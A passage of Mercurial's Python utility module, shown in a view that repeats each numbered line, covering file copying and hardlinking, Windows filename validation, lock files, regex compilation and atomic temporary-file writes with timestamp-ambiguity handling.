1738 shutil.copyfile(src, dest)
1739 if copystat:
1739 if copystat:
1740 # copystat also copies mode
1740 # copystat also copies mode
1741 shutil.copystat(src, dest)
1741 shutil.copystat(src, dest)
1742 else:
1742 else:
1743 shutil.copymode(src, dest)
1743 shutil.copymode(src, dest)
1744 if oldstat and oldstat.stat:
1744 if oldstat and oldstat.stat:
1745 newstat = filestat.frompath(dest)
1745 newstat = filestat.frompath(dest)
1746 if newstat.isambig(oldstat):
1746 if newstat.isambig(oldstat):
1747 # stat of copied file is ambiguous to original one
1747 # stat of copied file is ambiguous to original one
1748 advanced = (
1748 advanced = (
1749 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1749 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1750 os.utime(dest, (advanced, advanced))
1750 os.utime(dest, (advanced, advanced))
1751 except shutil.Error as inst:
1751 except shutil.Error as inst:
1752 raise error.Abort(str(inst))
1752 raise error.Abort(str(inst))
1753
1753
1754 def copyfiles(src, dst, hardlink=None, progress=None):
1754 def copyfiles(src, dst, hardlink=None, progress=None):
1755 """Copy a directory tree using hardlinks if possible."""
1755 """Copy a directory tree using hardlinks if possible."""
1756 num = 0
1756 num = 0
1757
1757
1758 def settopic():
1758 def settopic():
1759 if progress:
1759 if progress:
1760 progress.topic = _('linking') if hardlink else _('copying')
1760 progress.topic = _('linking') if hardlink else _('copying')
1761
1761
1762 if os.path.isdir(src):
1762 if os.path.isdir(src):
1763 if hardlink is None:
1763 if hardlink is None:
1764 hardlink = (os.stat(src).st_dev ==
1764 hardlink = (os.stat(src).st_dev ==
1765 os.stat(os.path.dirname(dst)).st_dev)
1765 os.stat(os.path.dirname(dst)).st_dev)
1766 settopic()
1766 settopic()
1767 os.mkdir(dst)
1767 os.mkdir(dst)
1768 for name, kind in listdir(src):
1768 for name, kind in listdir(src):
1769 srcname = os.path.join(src, name)
1769 srcname = os.path.join(src, name)
1770 dstname = os.path.join(dst, name)
1770 dstname = os.path.join(dst, name)
1771 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1771 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1772 num += n
1772 num += n
1773 else:
1773 else:
1774 if hardlink is None:
1774 if hardlink is None:
1775 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1775 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1776 os.stat(os.path.dirname(dst)).st_dev)
1776 os.stat(os.path.dirname(dst)).st_dev)
1777 settopic()
1777 settopic()
1778
1778
1779 if hardlink:
1779 if hardlink:
1780 try:
1780 try:
1781 oslink(src, dst)
1781 oslink(src, dst)
1782 except (IOError, OSError):
1782 except (IOError, OSError):
1783 hardlink = False
1783 hardlink = False
1784 shutil.copy(src, dst)
1784 shutil.copy(src, dst)
1785 else:
1785 else:
1786 shutil.copy(src, dst)
1786 shutil.copy(src, dst)
1787 num += 1
1787 num += 1
1788 if progress:
1788 if progress:
1789 progress.increment()
1789 progress.increment()
1790
1790
1791 return hardlink, num
1791 return hardlink, num
1792
1792
1793 _winreservednames = {
1793 _winreservednames = {
1794 'con', 'prn', 'aux', 'nul',
1794 'con', 'prn', 'aux', 'nul',
1795 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1795 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1796 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1796 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1797 }
1797 }
1798 _winreservedchars = ':*?"<>|'
1798 _winreservedchars = ':*?"<>|'
1799 def checkwinfilename(path):
1799 def checkwinfilename(path):
1800 r'''Check that the base-relative path is a valid filename on Windows.
1800 r'''Check that the base-relative path is a valid filename on Windows.
1801 Returns None if the path is ok, or a UI string describing the problem.
1801 Returns None if the path is ok, or a UI string describing the problem.
1802
1802
1803 >>> checkwinfilename(b"just/a/normal/path")
1803 >>> checkwinfilename(b"just/a/normal/path")
1804 >>> checkwinfilename(b"foo/bar/con.xml")
1804 >>> checkwinfilename(b"foo/bar/con.xml")
1805 "filename contains 'con', which is reserved on Windows"
1805 "filename contains 'con', which is reserved on Windows"
1806 >>> checkwinfilename(b"foo/con.xml/bar")
1806 >>> checkwinfilename(b"foo/con.xml/bar")
1807 "filename contains 'con', which is reserved on Windows"
1807 "filename contains 'con', which is reserved on Windows"
1808 >>> checkwinfilename(b"foo/bar/xml.con")
1808 >>> checkwinfilename(b"foo/bar/xml.con")
1809 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1809 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1810 "filename contains 'AUX', which is reserved on Windows"
1810 "filename contains 'AUX', which is reserved on Windows"
1811 >>> checkwinfilename(b"foo/bar/bla:.txt")
1811 >>> checkwinfilename(b"foo/bar/bla:.txt")
1812 "filename contains ':', which is reserved on Windows"
1812 "filename contains ':', which is reserved on Windows"
1813 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1813 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1814 "filename contains '\\x07', which is invalid on Windows"
1814 "filename contains '\\x07', which is invalid on Windows"
1815 >>> checkwinfilename(b"foo/bar/bla ")
1815 >>> checkwinfilename(b"foo/bar/bla ")
1816 "filename ends with ' ', which is not allowed on Windows"
1816 "filename ends with ' ', which is not allowed on Windows"
1817 >>> checkwinfilename(b"../bar")
1817 >>> checkwinfilename(b"../bar")
1818 >>> checkwinfilename(b"foo\\")
1818 >>> checkwinfilename(b"foo\\")
1819 "filename ends with '\\', which is invalid on Windows"
1819 "filename ends with '\\', which is invalid on Windows"
1820 >>> checkwinfilename(b"foo\\/bar")
1820 >>> checkwinfilename(b"foo\\/bar")
1821 "directory name ends with '\\', which is invalid on Windows"
1821 "directory name ends with '\\', which is invalid on Windows"
1822 '''
1822 '''
1823 if path.endswith('\\'):
1823 if path.endswith('\\'):
1824 return _("filename ends with '\\', which is invalid on Windows")
1824 return _("filename ends with '\\', which is invalid on Windows")
1825 if '\\/' in path:
1825 if '\\/' in path:
1826 return _("directory name ends with '\\', which is invalid on Windows")
1826 return _("directory name ends with '\\', which is invalid on Windows")
1827 for n in path.replace('\\', '/').split('/'):
1827 for n in path.replace('\\', '/').split('/'):
1828 if not n:
1828 if not n:
1829 continue
1829 continue
1830 for c in _filenamebytestr(n):
1830 for c in _filenamebytestr(n):
1831 if c in _winreservedchars:
1831 if c in _winreservedchars:
1832 return _("filename contains '%s', which is reserved "
1832 return _("filename contains '%s', which is reserved "
1833 "on Windows") % c
1833 "on Windows") % c
1834 if ord(c) <= 31:
1834 if ord(c) <= 31:
1835 return _("filename contains '%s', which is invalid "
1835 return _("filename contains '%s', which is invalid "
1836 "on Windows") % stringutil.escapestr(c)
1836 "on Windows") % stringutil.escapestr(c)
1837 base = n.split('.')[0]
1837 base = n.split('.')[0]
1838 if base and base.lower() in _winreservednames:
1838 if base and base.lower() in _winreservednames:
1839 return _("filename contains '%s', which is reserved "
1839 return _("filename contains '%s', which is reserved "
1840 "on Windows") % base
1840 "on Windows") % base
1841 t = n[-1:]
1841 t = n[-1:]
1842 if t in '. ' and n not in '..':
1842 if t in '. ' and n not in '..':
1843 return _("filename ends with '%s', which is not allowed "
1843 return _("filename ends with '%s', which is not allowed "
1844 "on Windows") % t
1844 "on Windows") % t
1845
1845
1846 if pycompat.iswindows:
1846 if pycompat.iswindows:
1847 checkosfilename = checkwinfilename
1847 checkosfilename = checkwinfilename
1848 timer = time.clock
1848 timer = time.clock
1849 else:
1849 else:
1850 checkosfilename = platform.checkosfilename
1850 checkosfilename = platform.checkosfilename
1851 timer = time.time
1851 timer = time.time
1852
1852
1853 if safehasattr(time, "perf_counter"):
1853 if safehasattr(time, "perf_counter"):
1854 timer = time.perf_counter
1854 timer = time.perf_counter
1855
1855
1856 def makelock(info, pathname):
1856 def makelock(info, pathname):
1857 """Create a lock file atomically if possible
1857 """Create a lock file atomically if possible
1858
1858
1859 This may leave a stale lock file if symlink isn't supported and signal
1859 This may leave a stale lock file if symlink isn't supported and signal
1860 interrupt is enabled.
1860 interrupt is enabled.
1861 """
1861 """
1862 try:
1862 try:
1863 return os.symlink(info, pathname)
1863 return os.symlink(info, pathname)
1864 except OSError as why:
1864 except OSError as why:
1865 if why.errno == errno.EEXIST:
1865 if why.errno == errno.EEXIST:
1866 raise
1866 raise
1867 except AttributeError: # no symlink in os
1867 except AttributeError: # no symlink in os
1868 pass
1868 pass
1869
1869
1870 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1870 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1871 ld = os.open(pathname, flags)
1871 ld = os.open(pathname, flags)
1872 os.write(ld, info)
1872 os.write(ld, info)
1873 os.close(ld)
1873 os.close(ld)
1874
1874
1875 def readlock(pathname):
1875 def readlock(pathname):
1876 try:
1876 try:
1877 return readlink(pathname)
1877 return readlink(pathname)
1878 except OSError as why:
1878 except OSError as why:
1879 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1879 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1880 raise
1880 raise
1881 except AttributeError: # no symlink in os
1881 except AttributeError: # no symlink in os
1882 pass
1882 pass
1883 with posixfile(pathname, 'rb') as fp:
1883 with posixfile(pathname, 'rb') as fp:
1884 return fp.read()
1884 return fp.read()
1885
1885
1886 def fstat(fp):
1886 def fstat(fp):
1887 '''stat file object that may not have fileno method.'''
1887 '''stat file object that may not have fileno method.'''
1888 try:
1888 try:
1889 return os.fstat(fp.fileno())
1889 return os.fstat(fp.fileno())
1890 except AttributeError:
1890 except AttributeError:
1891 return os.stat(fp.name)
1891 return os.stat(fp.name)
1892
1892
1893 # File system features
1893 # File system features
1894
1894
1895 def fscasesensitive(path):
1895 def fscasesensitive(path):
1896 """
1896 """
1897 Return true if the given path is on a case-sensitive filesystem
1897 Return true if the given path is on a case-sensitive filesystem
1898
1898
1899 Requires a path (like /foo/.hg) ending with a foldable final
1899 Requires a path (like /foo/.hg) ending with a foldable final
1900 directory component.
1900 directory component.
1901 """
1901 """
1902 s1 = os.lstat(path)
1902 s1 = os.lstat(path)
1903 d, b = os.path.split(path)
1903 d, b = os.path.split(path)
1904 b2 = b.upper()
1904 b2 = b.upper()
1905 if b == b2:
1905 if b == b2:
1906 b2 = b.lower()
1906 b2 = b.lower()
1907 if b == b2:
1907 if b == b2:
1908 return True # no evidence against case sensitivity
1908 return True # no evidence against case sensitivity
1909 p2 = os.path.join(d, b2)
1909 p2 = os.path.join(d, b2)
1910 try:
1910 try:
1911 s2 = os.lstat(p2)
1911 s2 = os.lstat(p2)
1912 if s2 == s1:
1912 if s2 == s1:
1913 return False
1913 return False
1914 return True
1914 return True
1915 except OSError:
1915 except OSError:
1916 return True
1916 return True
1917
1917
1918 try:
1918 try:
1919 import re2
1919 import re2
1920 _re2 = None
1920 _re2 = None
1921 except ImportError:
1921 except ImportError:
1922 _re2 = False
1922 _re2 = False
1923
1923
1924 class _re(object):
1924 class _re(object):
1925 def _checkre2(self):
1925 def _checkre2(self):
1926 global _re2
1926 global _re2
1927 try:
1927 try:
1928 # check if match works, see issue3964
1928 # check if match works, see issue3964
1929 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1929 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1930 except ImportError:
1930 except ImportError:
1931 _re2 = False
1931 _re2 = False
1932
1932
1933 def compile(self, pat, flags=0):
1933 def compile(self, pat, flags=0):
1934 '''Compile a regular expression, using re2 if possible
1934 '''Compile a regular expression, using re2 if possible
1935
1935
1936 For best performance, use only re2-compatible regexp features. The
1936 For best performance, use only re2-compatible regexp features. The
1937 only flags from the re module that are re2-compatible are
1937 only flags from the re module that are re2-compatible are
1938 IGNORECASE and MULTILINE.'''
1938 IGNORECASE and MULTILINE.'''
1939 if _re2 is None:
1939 if _re2 is None:
1940 self._checkre2()
1940 self._checkre2()
1941 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1941 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1942 if flags & remod.IGNORECASE:
1942 if flags & remod.IGNORECASE:
1943 pat = '(?i)' + pat
1943 pat = '(?i)' + pat
1944 if flags & remod.MULTILINE:
1944 if flags & remod.MULTILINE:
1945 pat = '(?m)' + pat
1945 pat = '(?m)' + pat
1946 try:
1946 try:
1947 return re2.compile(pat)
1947 return re2.compile(pat)
1948 except re2.error:
1948 except re2.error:
1949 pass
1949 pass
1950 return remod.compile(pat, flags)
1950 return remod.compile(pat, flags)
1951
1951
1952 @propertycache
1952 @propertycache
1953 def escape(self):
1953 def escape(self):
1954 '''Return the version of escape corresponding to self.compile.
1954 '''Return the version of escape corresponding to self.compile.
1955
1955
1956 This is imperfect because whether re2 or re is used for a particular
1956 This is imperfect because whether re2 or re is used for a particular
1957 function depends on the flags, etc, but it's the best we can do.
1957 function depends on the flags, etc, but it's the best we can do.
1958 '''
1958 '''
1959 global _re2
1959 global _re2
1960 if _re2 is None:
1960 if _re2 is None:
1961 self._checkre2()
1961 self._checkre2()
1962 if _re2:
1962 if _re2:
1963 return re2.escape
1963 return re2.escape
1964 else:
1964 else:
1965 return remod.escape
1965 return remod.escape
1966
1966
1967 re = _re()
1967 re = _re()
1968
1968
1969 _fspathcache = {}
1969 _fspathcache = {}
1970 def fspath(name, root):
1970 def fspath(name, root):
1971 '''Get name in the case stored in the filesystem
1971 '''Get name in the case stored in the filesystem
1972
1972
1973 The name should be relative to root, and be normcase-ed for efficiency.
1973 The name should be relative to root, and be normcase-ed for efficiency.
1974
1974
1975 Note that this function is unnecessary, and should not be
1975 Note that this function is unnecessary, and should not be
1976 called, for case-sensitive filesystems (simply because it's expensive).
1976 called, for case-sensitive filesystems (simply because it's expensive).
1977
1977
1978 The root should be normcase-ed, too.
1978 The root should be normcase-ed, too.
1979 '''
1979 '''
1980 def _makefspathcacheentry(dir):
1980 def _makefspathcacheentry(dir):
1981 return dict((normcase(n), n) for n in os.listdir(dir))
1981 return dict((normcase(n), n) for n in os.listdir(dir))
1982
1982
1983 seps = pycompat.ossep
1983 seps = pycompat.ossep
1984 if pycompat.osaltsep:
1984 if pycompat.osaltsep:
1985 seps = seps + pycompat.osaltsep
1985 seps = seps + pycompat.osaltsep
1986 # Protect backslashes. This gets silly very quickly.
1986 # Protect backslashes. This gets silly very quickly.
1987 seps.replace('\\','\\\\')
1987 seps.replace('\\','\\\\')
1988 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1988 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1989 dir = os.path.normpath(root)
1989 dir = os.path.normpath(root)
1990 result = []
1990 result = []
1991 for part, sep in pattern.findall(name):
1991 for part, sep in pattern.findall(name):
1992 if sep:
1992 if sep:
1993 result.append(sep)
1993 result.append(sep)
1994 continue
1994 continue
1995
1995
1996 if dir not in _fspathcache:
1996 if dir not in _fspathcache:
1997 _fspathcache[dir] = _makefspathcacheentry(dir)
1997 _fspathcache[dir] = _makefspathcacheentry(dir)
1998 contents = _fspathcache[dir]
1998 contents = _fspathcache[dir]
1999
1999
2000 found = contents.get(part)
2000 found = contents.get(part)
2001 if not found:
2001 if not found:
2002 # retry "once per directory" per "dirstate.walk" which
2002 # retry "once per directory" per "dirstate.walk" which
2003 # may take place for each patches of "hg qpush", for example
2003 # may take place for each patches of "hg qpush", for example
2004 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2004 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2005 found = contents.get(part)
2005 found = contents.get(part)
2006
2006
2007 result.append(found or part)
2007 result.append(found or part)
2008 dir = os.path.join(dir, part)
2008 dir = os.path.join(dir, part)
2009
2009
2010 return ''.join(result)
2010 return ''.join(result)
2011
2011
2012 def checknlink(testfile):
2012 def checknlink(testfile):
2013 '''check whether hardlink count reporting works properly'''
2013 '''check whether hardlink count reporting works properly'''
2014
2014
2015 # testfile may be open, so we need a separate file for checking to
2015 # testfile may be open, so we need a separate file for checking to
2016 # work around issue2543 (or testfile may get lost on Samba shares)
2016 # work around issue2543 (or testfile may get lost on Samba shares)
2017 f1, f2, fp = None, None, None
2017 f1, f2, fp = None, None, None
2018 try:
2018 try:
2019 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2019 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2020 suffix='1~', dir=os.path.dirname(testfile))
2020 suffix='1~', dir=os.path.dirname(testfile))
2021 os.close(fd)
2021 os.close(fd)
2022 f2 = '%s2~' % f1[:-2]
2022 f2 = '%s2~' % f1[:-2]
2023
2023
2024 oslink(f1, f2)
2024 oslink(f1, f2)
2025 # nlinks() may behave differently for files on Windows shares if
2025 # nlinks() may behave differently for files on Windows shares if
2026 # the file is open.
2026 # the file is open.
2027 fp = posixfile(f2)
2027 fp = posixfile(f2)
2028 return nlinks(f2) > 1
2028 return nlinks(f2) > 1
2029 except OSError:
2029 except OSError:
2030 return False
2030 return False
2031 finally:
2031 finally:
2032 if fp is not None:
2032 if fp is not None:
2033 fp.close()
2033 fp.close()
2034 for f in (f1, f2):
2034 for f in (f1, f2):
2035 try:
2035 try:
2036 if f is not None:
2036 if f is not None:
2037 os.unlink(f)
2037 os.unlink(f)
2038 except OSError:
2038 except OSError:
2039 pass
2039 pass
2040
2040
2041 def endswithsep(path):
2041 def endswithsep(path):
2042 '''Check path ends with os.sep or os.altsep.'''
2042 '''Check path ends with os.sep or os.altsep.'''
2043 return (path.endswith(pycompat.ossep)
2043 return (path.endswith(pycompat.ossep)
2044 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2044 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2045
2045
2046 def splitpath(path):
2046 def splitpath(path):
2047 '''Split path by os.sep.
2047 '''Split path by os.sep.
2048 Note that this function does not use os.altsep because this is
2048 Note that this function does not use os.altsep because this is
2049 an alternative of simple "xxx.split(os.sep)".
2049 an alternative of simple "xxx.split(os.sep)".
2050 It is recommended to use os.path.normpath() before using this
2050 It is recommended to use os.path.normpath() before using this
2051 function if need.'''
2051 function if need.'''
2052 return path.split(pycompat.ossep)
2052 return path.split(pycompat.ossep)
2053
2053
2054 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2054 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2055 """Create a temporary file with the same contents from name
2055 """Create a temporary file with the same contents from name
2056
2056
2057 The permission bits are copied from the original file.
2057 The permission bits are copied from the original file.
2058
2058
2059 If the temporary file is going to be truncated immediately, you
2059 If the temporary file is going to be truncated immediately, you
2060 can use emptyok=True as an optimization.
2060 can use emptyok=True as an optimization.
2061
2061
2062 Returns the name of the temporary file.
2062 Returns the name of the temporary file.
2063 """
2063 """
2064 d, fn = os.path.split(name)
2064 d, fn = os.path.split(name)
2065 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2065 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2066 os.close(fd)
2066 os.close(fd)
2067 # Temporary files are created with mode 0600, which is usually not
2067 # Temporary files are created with mode 0600, which is usually not
2068 # what we want. If the original file already exists, just copy
2068 # what we want. If the original file already exists, just copy
2069 # its mode. Otherwise, manually obey umask.
2069 # its mode. Otherwise, manually obey umask.
2070 copymode(name, temp, createmode, enforcewritable)
2070 copymode(name, temp, createmode, enforcewritable)
2071
2071
2072 if emptyok:
2072 if emptyok:
2073 return temp
2073 return temp
2074 try:
2074 try:
2075 try:
2075 try:
2076 ifp = posixfile(name, "rb")
2076 ifp = posixfile(name, "rb")
2077 except IOError as inst:
2077 except IOError as inst:
2078 if inst.errno == errno.ENOENT:
2078 if inst.errno == errno.ENOENT:
2079 return temp
2079 return temp
2080 if not getattr(inst, 'filename', None):
2080 if not getattr(inst, 'filename', None):
2081 inst.filename = name
2081 inst.filename = name
2082 raise
2082 raise
2083 ofp = posixfile(temp, "wb")
2083 ofp = posixfile(temp, "wb")
2084 for chunk in filechunkiter(ifp):
2084 for chunk in filechunkiter(ifp):
2085 ofp.write(chunk)
2085 ofp.write(chunk)
2086 ifp.close()
2086 ifp.close()
2087 ofp.close()
2087 ofp.close()
2088 except: # re-raises
2088 except: # re-raises
2089 try:
2089 try:
2090 os.unlink(temp)
2090 os.unlink(temp)
2091 except OSError:
2091 except OSError:
2092 pass
2092 pass
2093 raise
2093 raise
2094 return temp
2094 return temp
2095
2095
2096 class filestat(object):
2096 class filestat(object):
2097 """help to exactly detect change of a file
2097 """help to exactly detect change of a file
2098
2098
2099 'stat' attribute is result of 'os.stat()' if specified 'path'
2099 'stat' attribute is result of 'os.stat()' if specified 'path'
2100 exists. Otherwise, it is None. This can avoid preparative
2100 exists. Otherwise, it is None. This can avoid preparative
2101 'exists()' examination on client side of this class.
2101 'exists()' examination on client side of this class.
2102 """
2102 """
2103 def __init__(self, stat):
2103 def __init__(self, stat):
2104 self.stat = stat
2104 self.stat = stat
2105
2105
2106 @classmethod
2106 @classmethod
2107 def frompath(cls, path):
2107 def frompath(cls, path):
2108 try:
2108 try:
2109 stat = os.stat(path)
2109 stat = os.stat(path)
2110 except OSError as err:
2110 except OSError as err:
2111 if err.errno != errno.ENOENT:
2111 if err.errno != errno.ENOENT:
2112 raise
2112 raise
2113 stat = None
2113 stat = None
2114 return cls(stat)
2114 return cls(stat)
2115
2115
2116 @classmethod
2116 @classmethod
2117 def fromfp(cls, fp):
2117 def fromfp(cls, fp):
2118 stat = os.fstat(fp.fileno())
2118 stat = os.fstat(fp.fileno())
2119 return cls(stat)
2119 return cls(stat)
2120
2120
2121 __hash__ = object.__hash__
2121 __hash__ = object.__hash__
2122
2122
2123 def __eq__(self, old):
2123 def __eq__(self, old):
2124 try:
2124 try:
2125 # if ambiguity between stat of new and old file is
2125 # if ambiguity between stat of new and old file is
2126 # avoided, comparison of size, ctime and mtime is enough
2126 # avoided, comparison of size, ctime and mtime is enough
2127 # to exactly detect change of a file regardless of platform
2127 # to exactly detect change of a file regardless of platform
2128 return (self.stat.st_size == old.stat.st_size and
2128 return (self.stat.st_size == old.stat.st_size and
2129 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2129 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2130 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2130 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2131 except AttributeError:
2131 except AttributeError:
2132 pass
2132 pass
2133 try:
2133 try:
2134 return self.stat is None and old.stat is None
2134 return self.stat is None and old.stat is None
2135 except AttributeError:
2135 except AttributeError:
2136 return False
2136 return False
2137
2137
2138 def isambig(self, old):
2138 def isambig(self, old):
2139 """Examine whether new (= self) stat is ambiguous against old one
2139 """Examine whether new (= self) stat is ambiguous against old one
2140
2140
2141 "S[N]" below means stat of a file at N-th change:
2141 "S[N]" below means stat of a file at N-th change:
2142
2142
2143 - S[n-1].ctime < S[n].ctime: can detect change of a file
2143 - S[n-1].ctime < S[n].ctime: can detect change of a file
2144 - S[n-1].ctime == S[n].ctime
2144 - S[n-1].ctime == S[n].ctime
2145 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2145 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2146 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2146 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2147 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2147 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2148 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2148 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2149
2149
2150 Case (*2) above means that a file was changed twice or more at
2150 Case (*2) above means that a file was changed twice or more at
2151 same time in sec (= S[n-1].ctime), and comparison of timestamp
2151 same time in sec (= S[n-1].ctime), and comparison of timestamp
2152 is ambiguous.
2152 is ambiguous.
2153
2153
2154 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2154 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2155 timestamp is ambiguous".
2155 timestamp is ambiguous".
2156
2156
2157 But advancing mtime only in case (*2) doesn't work as
2157 But advancing mtime only in case (*2) doesn't work as
2158 expected, because naturally advanced S[n].mtime in case (*1)
2158 expected, because naturally advanced S[n].mtime in case (*1)
2159 might be equal to manually advanced S[n-1 or earlier].mtime.
2159 might be equal to manually advanced S[n-1 or earlier].mtime.
2160
2160
2161 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2161 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2162 treated as ambiguous regardless of mtime, to avoid overlooking
2162 treated as ambiguous regardless of mtime, to avoid overlooking
2163 by confliction between such mtime.
2163 by confliction between such mtime.
2164
2164
2165 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2165 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2166 S[n].mtime", even if size of a file isn't changed.
2166 S[n].mtime", even if size of a file isn't changed.
2167 """
2167 """
2168 try:
2168 try:
2169 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2169 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2170 except AttributeError:
2170 except AttributeError:
2171 return False
2171 return False
2172
2172
2173 def avoidambig(self, path, old):
2173 def avoidambig(self, path, old):
2174 """Change file stat of specified path to avoid ambiguity
2174 """Change file stat of specified path to avoid ambiguity
2175
2175
2176 'old' should be previous filestat of 'path'.
2176 'old' should be previous filestat of 'path'.
2177
2177
2178 This skips avoiding ambiguity, if a process doesn't have
2178 This skips avoiding ambiguity, if a process doesn't have
2179 appropriate privileges for 'path'. This returns False in this
2179 appropriate privileges for 'path'. This returns False in this
2180 case.
2180 case.
2181
2181
2182 Otherwise, this returns True, as "ambiguity is avoided".
2182 Otherwise, this returns True, as "ambiguity is avoided".
2183 """
2183 """
2184 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2184 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2185 try:
2185 try:
2186 os.utime(path, (advanced, advanced))
2186 os.utime(path, (advanced, advanced))
2187 except OSError as inst:
2187 except OSError as inst:
2188 if inst.errno == errno.EPERM:
2188 if inst.errno == errno.EPERM:
2189 # utime() on the file created by another user causes EPERM,
2189 # utime() on the file created by another user causes EPERM,
2190 # if a process doesn't have appropriate privileges
2190 # if a process doesn't have appropriate privileges
2191 return False
2191 return False
2192 raise
2192 raise
2193 return True
2193 return True
2194
2194
2195 def __ne__(self, other):
2195 def __ne__(self, other):
2196 return not self == other
2196 return not self == other
2197
2197
2198 class atomictempfile(object):
2198 class atomictempfile(object):
2199 '''writable file object that atomically updates a file
2199 '''writable file object that atomically updates a file
2200
2200
2201 All writes will go to a temporary copy of the original file. Call
2201 All writes will go to a temporary copy of the original file. Call
2202 close() when you are done writing, and atomictempfile will rename
2202 close() when you are done writing, and atomictempfile will rename
2203 the temporary copy to the original name, making the changes
2203 the temporary copy to the original name, making the changes
2204 visible. If the object is destroyed without being closed, all your
2204 visible. If the object is destroyed without being closed, all your
2205 writes are discarded.
2205 writes are discarded.
2206
2206
2207 checkambig argument of constructor is used with filestat, and is
2207 checkambig argument of constructor is used with filestat, and is
2208 useful only if target file is guarded by any lock (e.g. repo.lock
2208 useful only if target file is guarded by any lock (e.g. repo.lock
2209 or repo.wlock).
2209 or repo.wlock).
2210 '''
2210 '''
2211 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2211 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2212 self.__name = name # permanent name
2212 self.__name = name # permanent name
2213 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2213 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2214 createmode=createmode,
2214 createmode=createmode,
2215 enforcewritable=('w' in mode))
2215 enforcewritable=('w' in mode))
2216
2216
2217 self._fp = posixfile(self._tempname, mode)
2217 self._fp = posixfile(self._tempname, mode)
2218 self._checkambig = checkambig
2218 self._checkambig = checkambig
2219
2219
2220 # delegated methods
2220 # delegated methods
2221 self.read = self._fp.read
2221 self.read = self._fp.read
2222 self.write = self._fp.write
2222 self.write = self._fp.write
2223 self.seek = self._fp.seek
2223 self.seek = self._fp.seek
2224 self.tell = self._fp.tell
2224 self.tell = self._fp.tell
2225 self.fileno = self._fp.fileno
2225 self.fileno = self._fp.fileno
2226
2226
2227 def close(self):
2227 def close(self):
2228 if not self._fp.closed:
2228 if not self._fp.closed:
2229 self._fp.close()
2229 self._fp.close()
2230 filename = localpath(self.__name)
2230 filename = localpath(self.__name)
2231 oldstat = self._checkambig and filestat.frompath(filename)
2231 oldstat = self._checkambig and filestat.frompath(filename)
2232 if oldstat and oldstat.stat:
2232 if oldstat and oldstat.stat:
2233 rename(self._tempname, filename)
2233 rename(self._tempname, filename)
2234 newstat = filestat.frompath(filename)
2234 newstat = filestat.frompath(filename)
2235 if newstat.isambig(oldstat):
2235 if newstat.isambig(oldstat):
2236 # stat of changed file is ambiguous to original one
2236 # stat of changed file is ambiguous to original one
2237 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2237 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2238 os.utime(filename, (advanced, advanced))
2238 os.utime(filename, (advanced, advanced))
2239 else:
2239 else:
2240 rename(self._tempname, filename)
